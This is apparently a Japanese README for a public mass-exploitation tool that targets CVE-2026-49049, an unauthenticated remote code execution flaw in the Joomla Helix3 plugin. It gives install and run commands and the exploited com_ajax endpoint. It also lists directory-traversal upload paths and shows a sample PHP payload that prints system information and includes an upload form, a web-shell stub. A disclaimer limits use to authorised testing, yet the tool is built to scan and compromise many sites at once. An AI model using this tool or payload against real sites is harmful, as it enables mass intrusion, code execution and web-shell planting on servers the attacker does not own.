
CVE-2026-49049用のマス脆弱性スキャナ - Joomla Helix3プラグインの認証なしリモートコード実行。マルチスレッドで、実行されたPHPペイロードと生のPHPペイロードの両方を検出します。
CVE-2026-49049 用のマス脆弱性スキャナー - Joomla Helix3 Framework における未認証のリモートコード実行。
このツールは、Helix3 プラグインで見つかった CVE-2026-49049 脆弱性について、複数の Joomla サイトをチェックします。この脆弱性により、認証されていない攻撃者がターゲットサーバー上で任意の PHP コードをアップロードおよび実行できます。
スキャナーは以下を試みます:
helix3 プラグインを使用して com_ajax エンドポイントを悪用します。requests ライブラリpip install requests
🛠 インストール
git clone https://github.com/Jenderal92/CVE-2026-49049.git
cd CVE-2026-49049
chmod +x cve-2026-49049.py
🚀 使用方法
python2 cve-2026-49049.py targets.txt
入力形式
targets.txt の各行には、1つのドメインまたは IP を指定します:
example.com
https://example.com
http://192.168.1.100
出力ファイル
ファイル 説明 results.txt ペイロードが実行された脆弱な URL rez.txt ペイロードがアップロードされたが実行されなかった URL(生の PHP)
出力例
============================================================
CVE-2026-49049 Mass Scanner
Results: results.txt (executed)
Raw PHP: rez.txt (not executed)
============================================================
[*] Loaded 150 targets
[*] Using 20 threads
[+] VULNERABLE: https://target.com
[*] RAW PHP: https://target2.com
[-] NOT VULNERABLE: https://secure.com
============================================================
[+] Selesai!
[+] Vulnerable: 12
[+] Raw PHP: 5
[+] Vulnerable URLs:
https://target.com/tmp_123456.php.json
⚙️ 設定
スクリプト内で以下の変数を調整できます:
変数 デフォルト 説明 THREADS 20 同時実行スレッド数 PATHS ['../../../', '../../../../'] ディレクトリトラバーサルパス TIMEOUT 5 HTTP リクエストのタイムアウト RESULT_FILE 'results.txt' 脆弱なサイトの出力ファイル RAW_RESULT_FILE 'rez.txt' 生の PHP サイトの出力ファイル
🧠 仕組み
スクリプトは以下の URL に POST リクエストを送信します:
/index.php?option=com_ajax&plugin=helix3&format=json
ペイロードは以下を行います:
その後、ファイルにアクセスできるかどうか、PHP コードが実行されるか、単なるプレーンテキストとして表示されるだけかをチェックします。
ペイロード例
<?php
$s = "Shinday";
echo '<center><pre><br><br><h1 style="color:red;">'.$s.'</h1><br>'.php_uname()."\n".'<br><br><br>';
// ... upload form
?>
⚠️ 免責事項
このツールは、教育目的および許可されたテスト目的のみで使用してください。
所有していない、またはテストする明示的な許可を得ていないシステムに対するこのツールの不正使用は違法です。作者は、このツールの誤用やそれによって引き起こされた損害について一切責任を負いません。
その他の免責事項 Jenderal92 の表紙に記載されている免責事項をご覧いただけます。こちら !!! で確認できます。